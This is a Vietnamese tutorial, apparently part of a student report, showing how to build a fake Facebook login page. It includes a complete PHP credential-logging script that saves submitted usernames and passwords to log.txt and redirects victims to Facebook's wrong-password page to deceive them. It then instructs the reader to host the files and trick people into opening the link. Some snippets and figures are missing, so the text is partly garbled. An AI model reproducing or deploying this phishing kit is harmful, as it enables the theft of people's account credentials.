Phishing là một kỹ thuật hack phổ biến và nguy hiểm để ăn cấp thông tin bí mật của mọi người bằng cách tạo ra các trang đăng nhập giả. Hôm nay mình sẽ cho các bạn và thầy cô thấy làm thế nào để tạo ra được một trang giả mạo đơn giản.
Để thực hiện chúng ta cần tạo ra 3 file sau : 1) facebook.html, 2) mail.php, 3) log.txt
Bước 1:
Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình ngái trang facebook.com. Hiện trang được rất nhiều người sử dụng , ta click chuột phải và chọn xem nguồn trang ( View page source )
Hình 3.13: Xem nguồn của website
Còn bây giờ ta hãy xóa toàn bộ nội dung trong “ ” và thay thế đó thành
Hình 3.14: Thay đổi phương thức truyền. Xong rồi ta lưu file trên lại với tên là “facebook.html”
Hình 3.15: Lưu file login.html Vậy là ta làm xong file fake login.html
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1'); $handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Hình 3.16: Code trang mail.php
.Khi ai đó click vào chữ đăng nhập trên fake page của bạn thì sẽ được chuyển hướng sang cái link “https://www.facebook.com/login.php?login_attempt=1”... đó là link thông báo sai mật khẩu nhằm đánh lạc hướng victim và bạn có thể chỉnh lại cái link đó tùy theo cách sử dụng của bạn.
Bước 3:
Tạo ra tiếp 1 file nữa là "log.txt" rồi để đó.
Vậy là xong...tiếp theo các bạn upload cả 3 file này nên 1 webhosting nào đó. Sau khi UPLOAD xong link fake page của bạn sẽ có dạng như hình sau :
Hình 3.17: Web hosting giả mạo đã Up lên.
3.3.2Hiện thực
Sau khi đã chuẩn bị xong hết giờ ta bằng một thủ thuật nào đó sẽ link này đến cho nhiều người. Khi họ gõ tài khoản và pass vào đó thì những thông tin đó sẽ được lưu lại ở file log.txt trên host. Mở file log.txt đó lên để xem.
3.4 Hack điểm trong Flash game3.4.1Chuẩn bị